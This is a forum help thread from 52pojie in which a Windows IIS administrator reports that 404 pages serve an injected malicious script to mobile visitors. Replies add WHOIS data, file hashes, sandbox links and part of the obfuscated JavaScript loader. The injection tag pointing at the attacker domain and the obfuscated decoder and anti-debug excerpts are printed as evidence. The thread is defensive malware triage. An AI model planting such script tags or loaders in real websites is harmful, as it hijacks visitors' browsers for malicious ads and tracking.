吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 83|回复: 3
上一主题 下一主题
收起左侧

求助阿里云IIS 全站访问不存在的页面(404)时,在手机 UA 下被注入恶意脚本

[复制链接]
跳转到指定楼层
楼主
Ym0081gg 发表于 2026-8-20 13:52 回帖奖励
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 Ym0081gg 于 2026-8-20 15:11 编辑

- 操作系统:Windows Server 2012 R2 数据中心版 64位中文版- Web 服务器:IIS 6.0问题描述:1. 现象:访问服务器上任意网站的不存在页面(返回 404),如果使用手机浏览器或模拟手机 User-Agent,响应中会被注入如下恶意脚本:   <script src="https://tz.sopdlx.com/nn.js"></script>   而使用桌面浏览器 User-Agent 访问,响应正常(404 无脚本注入)。   示例请求:http://gz-qsfw.cn/xxxxx(手机 UA 返回 200 并带脚本,桌面 UA 返回 404 无脚本)。2. 影响范围:服务器上所有 IIS 站点均受影响,不是单个网站问题。3. 已排查内容:    已收集的日志文件:   - Failed Request Tracing 日志:C:\inetpub\logs\FailedReqLogFiles\W3SVC21\fr000046.xml(包含恶意脚本 Buffer 事件) https://wwaly.lanzouq.com/iBGj343lqtih (这是日志文件)
   <EventData>  <Data Name="ContextId">{8001EECF-0002-7200-B63F-84710C7967BB}</Data>  <Data Name="Buffer"><script src="https://tz.sopdlx.com/nn.js"></script></Data> </EventData>




新发现大概率是篡改了这个文件(C:\Windows\System32\inetsrv\custerr.dll),有懂的大佬可以看下
https://wwaly.lanzouq.com/im28l43mj9xg

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

沙发
 楼主| Ym0081gg 发表于 2026-8-20 16:18 |楼主
C:\Windows\System32\inetsrv\config\applicationHost.config 里面有个这个配置
  <httpErrors lockAttributes="allowAbsolutePathsWhenDelegated,defaultPath">
            <error statusCode="401" prefixLanguageFilePath="%SystemDrive%\inetpub\custerr" path="401.htm" />
            <error statusCode="403" prefixLanguageFilePath="%SystemDrive%\inetpub\custerr" path="403.htm" />
            <error statusCode="404" prefixLanguageFilePath="" path="/404" responseMode="ExecuteURL" />
            <error statusCode="405" prefixLanguageFilePath="%SystemDrive%\inetpub\custerr" path="405.htm" />
            <error statusCode="406" prefixLanguageFilePath="%SystemDrive%\inetpub\custerr" path="406.htm" />
            <error statusCode="412" prefixLanguageFilePath="%SystemDrive%\inetpub\custerr" path="412.htm" />
            <error statusCode="500" prefixLanguageFilePath="%SystemDrive%\inetpub\custerr" path="500.htm" />
            <error statusCode="501" prefixLanguageFilePath="%SystemDrive%\inetpub\custerr" path="501.htm" />
            <error statusCode="502" prefixLanguageFilePath="%SystemDrive%\inetpub\custerr" path="502.htm" />
        </httpErrors>
这个404 估计就是原因,但是改回静态的话 也只是表面看着没事 不知道根源在哪儿
3#
 楼主| Ym0081gg 发表于 2026-8-20 16:36 |楼主
Ym0081gg 发表于 2026-8-20 16:18
C:\Windows\System32\inetsrv\config\applicationHost.config 里面有个这个配置
  
            

最新情况是还原了custerr.dll和<error statusCode="404" prefixLanguageFilePath="" path="/404" responseMode="ExecuteURL" /> 但是依然没用
4#
AI-Compare 发表于 2026-8-20 21:12
本帖最后由 AI-Compare 于 2026-8-20 21:14 编辑

服务器进行全盘杀毒,将整站源文件拷贝至新电脑/虚拟机IIS内重建
重建后问题是否能复现,如果依旧能复现,则源码可能已被嵌入恶意代码

如果不能复现,则问题可能出现在系统,软件,漏洞,读写权限,未鉴权后门等
如果是多台集群,请立即对所有集群全盘查杀,警惕更深入横向感染或勒索窃密

域 名 sopdlx[.]com
注册商 Gname.com Pte. Ltd.
注册人
邮 箱
地 区 中国(CN)
注册日 2025-09-10 07:52:39 UTC+8
过期日 2028-09-10 07:52:39 UTC+8
更新日 2026-05-07 21:03:38 UTC+8
IANA_ID 1923
状 态 客户端禁止转移
DNS  johnny[.]ns.cloudflare[.]com
    sue[.]ns.cloudflare[.]com
DNSSEC 未配置

文件指纹
custerr.dll
大小: 449536 字节 : 439 KiB
CRC32: 98A2895D
CRC64: 7DADC00AE5A1ECA2
XXH64: CFD79389A191D796
SHA256: 140f0439c44aaa1615e0399b2d7607168cd976534557fce51b856c7b43f5ef85
SHA3-256: 48312f71646fe12a7ea94d374381ba46065c6118f36a1b90abfbedde3aaa24fc

nn.js
大小: 130093 字节 : 127 KiB
CRC32: AF7AEF4D
CRC64: 94385E424F5E87E8
XXH64: 238E5778B2BA740C
SHA256: 09bb5433ffa2e61f3080a4080d797600520997daf0a99e9da6713f984d0d9864
SHA3-256: cbe1ca077b53d82dc667e05a1a1762fbcfdde5309a91fd4f11b0ede2b14750f6

参考病名

custerr.dll
Trojan.Win64.Badiis

nn.js
JS:Trojan.Cryxos.14530

基础信息

x64 Microsoft Visual C++ v14.44 - 2025 - (DLL 4889..24)  - no sec. Cab.7z.Zip [ Win Vista ] - EXP only 1 : RegisterModule , 

调试符号
No PDB

编译时间
2026-05-23

修改时间
2009-07-14 09:41

转义类型

十六进制
\x67\x67\x52\x64

运行提示

nn.js:1:62081

该代码已使用 VMencryption.com.core 进行高强度加密保护

console[_0x37864b(680, '%Dcc')](
  _0x37864b(1342, '66Bo') + _0x15bdcc(829, 'eh&f') + _0x244b7a(1382, 'NP2a') + _0x244b7a(1401, 'kxbH') + _0x15bdcc(1339, 'Ro!%') + _0x244b7a(1022, 'V8cY') + _0x15bdcc(581, '^Um5'),
  _0x46f389(620, 'BwIg') + _0x244b7a(586, '6cA]') + _0x15bdcc(776, 'P%cK') + _0x244b7a(822, 'eh&f') + _0x15bdcc(1347, '[U3g') + _0x244b7a(1025, '^Um5') + _0x2861a7(800, 'G)Jr') + _0x2861a7(712, 'aQul')
),

异常格式

{_0xefc29b=_0xefc29b

多种未闭合类括弧,无法自动简易格式化

反制调试

function anonymous(
) {
debugger
}

样式预览

function _0x199d() {
  var _0x40be33 = [
    'ggRdL8kVW54q',
    'WPLLW6lcHmkrDq',
    .....
    'sCkwW5GTCq'
  ];
  _0x199d = function () {
    return _0x40be33;
  };
  return _0x199d();
}

var _0x37864b = _0xce42,
_0x15bdcc = _0xce42,
.....
_0x113f95 = _0xce42;

function _0xce42(_0xefc29b, _0x2fea5c) {
  _0xefc29b = _0xefc29b - (6292 + - 1958 * 1 + - 3999);
  var _0x486847 = _0x199d();
  var _0x58557e = _0x486847[_0xefc29b];
  if (_0xce42['QHghct'] === undefined) {
    var _0x300346 = function (_0x4e1bad) {
      var _0x1c928c = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
      var _0x3d529f = '',
      _0x41e067 = '',
      _0x3b0985 = _0x3d529f + _0x300346;
      for (
        var _0x38457b = 7538 + 8162 + - 15700,
        _0x3b7043,
        _0x3653a3,
        _0x2c42a8 = - 1 * 7299 + - 5147 + 254 * 49;
        _0x3653a3 = _0x4e1bad['charAt'](_0x2c42a8++);
        ~_0x3653a3 &&
        (
          _0x3b7043 = _0x38457b % ( - 29 * - 307 + 2191 + - 11090) ? _0x3b7043 * (6362 + - 6402 + 104) + _0x3653a3 : _0x3653a3,
          _0x38457b++ % (8291 + - 7287 + 125 * - 8)
        ) ? _0x3d529f += _0x3b0985['charCodeAt'](_0x2c42a8 + ( - 781 * - 10 + - 8536 + 32 * 23)) - ( - 47 * 203 + - 4555 * - 2 + 441) !== - 7647 * - 1 + - 5673 + - 21 * 94 ? String['fromCharCode'](
          6283 * 1 + - 59 * 83 + 29 * - 39 & _0x3b7043 >> (
            - ( - 2213 + - 248 * - 1 + 7 * 281) * _0x38457b & - 9544 + 94 * 87 + - 343 * - 4
          )
        ) : _0x38457b : - 4950 + - 1 * 9939 + 7 * 2127
      ) {
        _0x3653a3 = _0x1c928c['indexOf'](_0x3653a3);
      }
      for (
        var _0x227036 = - 1 * - 3749 + 1558 + - 183 * 29,
        _0x4cba68 = _0x3d529f['length'];
        _0x227036 < _0x4cba68;
        _0x227036++
      ) {
        _0x41e067 += '%' + (
          '00' + _0x3d529f['charCodeAt'](_0x227036) ['toString'](1 * - 4739 + 74 * - 127 + - 1 * - 14153)
        ) ['slice']( - (7180 + - 477 + - 6701 * 1));
      }
      return decodeURIComponent(_0x41e067);
    };

.....

AI分析

该脚本经过高度混淆,核心功能是检测用户环境并动态注入广告或劫持页面行为。

1. 环境检测
移动设备识别:通过正则匹配 navigator.userAgent,检测是否为手机/平板(mobi|android|iphone...)。
页面嵌入检测:检查是否在 <iframe> 中运行(window.top !== window.self),若在 iframe 内则可能不执行或执行不同逻辑。
开发者工具检测:利用 debugger 语句、函数 toString 正则匹配等方式,检测是否打开控制台,若检测到调试行为则可能进入死循环或改变流程。

2. DOM 动态注入
创建隐藏元素:生成 <div>、<style>、<iframe> 等元素,并设置样式(如 display:none、visibility:hidden)以隐藏界面。
加载外部资源:通过 <iframe> 的 src 属性或动态创建的 <script> 加载第三方内容(可能为广告或重定向页面)。
修改样式:注入 CSS 规则,可能用于隐藏原有页面元素或覆盖点击区域。

3. 事件监听与交互劫持
监听用户操作:添加 click、touchstart 等事件,在用户点击时触发回调。
定时轮询:使用 setInterval 反复检查环境状态或执行特定动作(如加载广告、更新页面内容)。
延迟执行:通过 setTimeout 延迟执行关键函数,以绕过某些页面加载时的检测。

4. 反调试与防分析
无限循环/递归:_0x1d06e6 函数中存在递归调用,可能用于消耗 CPU 或干扰调试器。
混淆字符串:所有字符串均通过自定义解密函数动态还原,增加静态分析难度。
检查函数上下文:利用 Function.prototype.toString 检测是否被篡改,以识别调试环境。

推测意图
该脚本极可能是一个广告加载器或流量劫持脚本,用于:
在目标页面中注入不可见的广告或弹窗,获取展示收益。
通过点击劫持(Clickjacking)诱导用户点击隐藏链接。
检测到调试环境时避免暴露真实行为,以绕过安全分析。
由于代码被混淆,具体加载的 URL 或广告平台无法直接提取,但其整体结构符合常见的恶意广告脚本特征。运行此脚本的页面可能会被植入非法广告、重定向或收集用户行为数据。

本回答由 AI 生成,内容仅供参考,请仔细甄别

脚本网址
https://s.threatbook.com/report/url/e188ad90f344caa9d0458f8f6898646a

custerr.dll
https://virusscan.jotti.org/zh-CN/filescanjob/2q6qx0bsb6
https://www.maldun.com/analysis/YXNkZmRzZmFkc2YxMjgyNzkyZHNmYXNkZmFzZGY=/
https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&id=AaAfAgkUmTITNisANm-W
https://fenxi.antiy.cn/#/entirety/file/searchResult?hash=187cd28a6111814c4396db6127c8d6d2
https://virus.cverc.org.cn/#/entirety/file/searchResult?hash=187cd28a6111814c4396db6127c8d6d2
https://www.virscan.org/report/140f0439c44aaa1615e0399b2d7607168cd976534557fce51b856c7b43f5ef85
https://www.virustotal.com/gui/file/140f0439c44aaa1615e0399b2d7607168cd976534557fce51b856c7b43f5ef85
https://s.threatbook.com/report/file/140f0439c44aaa1615e0399b2d7607168cd976534557fce51b856c7b43f5ef85
https://sandbox.qianxin.com/tq/report/toNewReport.do?rid=50182971c8a702a11ce66ffa500f34fc&sk=63509342
https://opentip.kaspersky.com/140F0439C44AAA1615E0399B2D7607168CD976534557FCE51B856C7B43F5EF85/results?tab=upload

nn.js
https://virusscan.jotti.org/zh-CN/filescanjob/w6zrb2tix1
https://www.maldun.com/analysis/YXNkZmRzZmFkc2YxMjgyOTI2ZHNmYXNkZmFzZGY=/
https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&id=AaAfK09gmTITNisANm-i
https://fenxi.antiy.cn/#/entirety/file/searchResult?hash=7abe3a93a155124b0ef1947e66095ccd
https://virus.cverc.org.cn/#/entirety/file/searchResult?hash=7abe3a93a155124b0ef1947e66095ccd
https://www.virscan.org/report/09bb5433ffa2e61f3080a4080d797600520997daf0a99e9da6713f984d0d9864
https://www.virustotal.com/gui/file/09bb5433ffa2e61f3080a4080d797600520997daf0a99e9da6713f984d0d9864
https://s.threatbook.com/report/file/09bb5433ffa2e61f3080a4080d797600520997daf0a99e9da6713f984d0d9864
https://sandbox.qianxin.com/tq/report/toNewReport.do?rid=08afb2c663d6ebfb33a5def0edd975d5&sk=43551541
https://opentip.kaspersky.com/09BB5433FFA2E61F3080A4080D797600520997DAF0A99E9DA6713F984D0D9864/results?tab=upload

您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - 52pojie.cn ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2026-8-21 02:36

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表